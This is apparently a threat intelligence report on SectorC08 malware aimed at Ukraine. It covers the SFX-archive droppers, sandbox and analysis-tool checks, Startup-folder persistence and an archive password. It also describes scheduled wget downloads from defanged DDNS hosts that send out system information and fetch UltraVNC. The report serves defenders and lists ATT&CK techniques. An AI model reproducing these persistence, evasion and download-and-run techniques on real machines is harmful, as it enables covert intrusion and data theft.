Unlike other state sponsored threat actors, SectorC08 appears to be only concerned with a single target: Ukraine. Artifacts of their likely activity have been found as far back as 2013 and up till today their modus operandi in their initial stages of operation has not changed much.
We analyzed over 50 of their executable malware files found very recently in order to look at similarities, differences, and outliers. We found that while a few samples still used SectorC08’s executable file structure which contained batch scripts which were split out into many files (e.g. Wariables.cmd) or batch scripts together with a decoder executable and an encoded executable, most of them followed the structure we will be detailing below.
Example of a Typical First Stage Structure (a8f849d536481d7d8a0fa59a7bcc03dd3387ab4cc14c0342371ae295817f505c)
All samples which we can confirm came in the months of May and June used the same structure in their malware which we will be describing below: a 7zSFX archive which opens a password protected WinRARSFX archive, which then attempts to use a version of wget to download its third stage malware which is another WinRARSFX archive such as UltraVNC.
Some of the malware samples we found contained an embedded fake document in them pertaining to Ukrainian issues. We observed six such embedded fake documents which were sometimes reused against different targets. These documents are opened from the embedded batch file in the 7zSFX archive environment.
The batch file is always the file which SectorC08 set to be ran after the 7zSFX archive is executed, and the way the file distracts the victim while it performs its malicious activity is to open up a fake document from that batch file.
The fake documents are always in Ukrainian and pertain to Ukrainian issues such as legal, political, military or police issues.
By comparing the document content date to the malware internal versioning code (described later) and from our knowledge of the malware’s previous versioning codes and dates, we can conclude that when the malware internal versioning code corresponds to a date, it is at least a roughly accurate timestamp and we can create a partial timeline of events.
For example, the fake military document dated 21st May 2019 was found in three separate malware samples, where the version code “21.05” (21st May) appeared twice and “22.05” (22nd May) appeared once. Another example is the undated fake police message where the version code “24.05” (24th May) appeared thrice and “prok” and “27” appeared once each.
At the start of this batch script, the malware looks for Wireshark and Process Explorer using the TaskList command. If any of these exist, the script exits using an unspecified label “exit”. But due to an error in their programming logic, this does not actually do everything which the attacker thinks it does.
While looking for Wireshark and Process Explorer were consistent across their malware samples, we also found singular instances where the malware was also checking for HttpAnalyzer (9dbc77844fc3ff3565970cb09d629a710fdec3065b6e4c37b20a889c716c53bf) and an old different malware family sample of SectorC08’s which also checked whether the machine’s username was a known sandbox username such as “TEQUILABOOMBOOM” or “MALWARETEST” (034fed63fc366ff3cf0137caced77a046178926c63faf1a8cd8db9d185d40821).
First Stage Persistence
In this sample, the first stage 7zSFX archive contains the first stage batch script (filename: “18974.cmd”), a shortcut link to run “%USERPROFILE%\winver.exe -pgblfhsuyjqyst” (filename: “11666”), the fake document (6710), and the second stage WinRARSFX archive (filename: “5610”). In the first stage batch script, we can see that the second stage executable is getting renamed and moved to “%USERPROFILE%\winver.exe”, then the shortcut file is being moved to “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\winver.lnk” for persistence.
Sample Second Stage (EE623D8FCF366249A381B0CB50CE6295E913F88CB0F9CB4D8116C0F3D9FA16F2)
In many recent cases, their second stage is a password protected WinRARSFX which contains a VBS file whose only purpose is to run batch commands via WScript, a .cmd batch file containing the commands to be ran, and a renamed version of wget.
In this example, we see that the password used to open the second stage is “uyjqystgblfhs”. While SectorC08 sometimes changes the WinRARSFX password (or simply uses another 7zSFX unprotected archive), we observed this particular password being used at least 11 times across their various malware samples. This shows that while they have likely automated parts of their process for building these batch scripts, a lot of it is still completely manual.
Second Stage Persistence and Wget
After the first stage, the 7zSFX archive always eventually acts as a downloader in the second stage, launching various versions of wget in order to download its third stage.
From the sample contents below, we can see that MicrosoftCreate.exe (some version of wget) is being renamed and moved to “%APPDATA%\Microsoft\IE\weristotal.exe”. This weristotal.exe is then set to download an EXE file from hxxp://bitvers[.]ddns[.]net/<computerinfo>/winusers.exe in a scheduled task which is then executed in another scheduled task. The scheduled task to perform the download happens every 30 minutes, and this is important to note because SectorC08’s servers very often returns a HTTP 403 Forbidden error instead of the requested file.
Separately, the original MicrosoftCreate.exe also attempts to download another executable, jasfix.exe in this case, from hxxp://wincreator[.]ddns[.]net/<computerinfo>/winusers.exe. While both of these wget downloads are to different DDNS servers, both servers point to the same IP addresses and the same file paths, meaning that it is also a form of redundancy for SectorC08.
In order to identify victims, fields sent in the wget command include the “comp” field (containing %computername% environment variable) and the “sysinfo” field (containing the entire contents of the systeminfo command). All of these are sent in the clear using HTTP.
Another interesting area to note from how they run wget is the user-agent used and the “versiya” (version) field in the post-data. While the user-agent is left as the default wget user agent about half the time, at other times various and even unusual user-agent strings are used which suggests that SectorC08 sometimes knows which user-agent strings are used or likely to be used in the victim environment.
|07.05||Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36|
|13.05||Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0|
|13.05||Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) Safari/604.1|
|21.05||Mozilla/5.0 (Linux; Android 5.1; Neffos C5 Build/LMY47D) Mobile Safari/537.36|
|21.05||Mozilla/5.0 (X11; Linux x86_64) Safari/537.36|
|23.05||Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0|
|23.05||Mozilla/5.0 (Windows NT 10.0) Safari/537.36 OPR/54.0.2952.64|
|24.05||Mozilla/5.0 (Linux; Android 8.0.0; SM-G955F Build/R16NW) Safari/537.36|
|24.05||Mozilla/5.0 (Windows NT 5.1) Chrome/49.0.2623.112|
|U_04||Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0|
|USB_04||Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0|
|USB_07||Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0|
|USB_08||Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0|
| %1_401|| Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64|
|osb||Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36|
Additionally, if a proxy is defined at “HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings” with the registry keys “ProxyServer”, “ProxyUser”, and “ProxyPass”, these values will be used in the wget “http_proxy”, “–proxy-user”, and “–proxy-password” fields in another invocation of wget.
In total we observed six different versions of wget being used by SectorC08 recently, which are what appears to be different variations of GNU Wget 1.11.4 and GNU Wget 1.16.
Stage 3 and 4 – UltraVNC
The file downloaded by wget is actually the stage 3 binary, another 7zSFX archive but this time containing a password protected WinRARSFX archive which uses UltraVNC for remote administration. In fact, using UltraVNC for unauthorized remote administration has been a tactic which SectorC08 has been using for many years.
SectorC08 is a threat group interested in targeting Ukraine and has been doing so for many years. While their tactics have not changed much even after so long, that only goes to show that they have achieved at least some success in their operations over the years. From a technical standpoint, their custom malware might appear to some as unsophisticated due to the low technical difficulty in creating these malware samples, but in fact due to their creative use of various versions of open source utilities and modifying a lot of static information such as the 7zSFX and WinRARSFX versions used to create their executables and even the icons of every file, they have consistently achieved low detections from security products and are likely to continue to do so.
Indicators of Compromise
wget utilities (SHA-256)
Embedded Lure Documents
MITRE ATT&CK Techniques
The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.
T1091 Replication Through Removable Media
T1193 Spearphishing Attachment
T1059 Command-Line Interface
T1053 Scheduled Task
T1204 User Execution
T1047 Windows Management Instrumentation
T1158 Hidden Files and Directories
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task
T1023 Shortcut Modification
T1158 Hidden Files and Directories
T1027 Obfuscated Files or Information
T1057 Process Discovery
T1012 Query Registry
T1082 System Information Discovery
T1016 System Network Configuration Discovery
T1124 System Time Discovery
T1497 Virtualization/Sandbox Evasion
Command and Control
T1043 Commonly Used Port
T1065 Uncommonly Used Port
T1219 Remote Access Tools
T1071 Standard Application Layer Protocol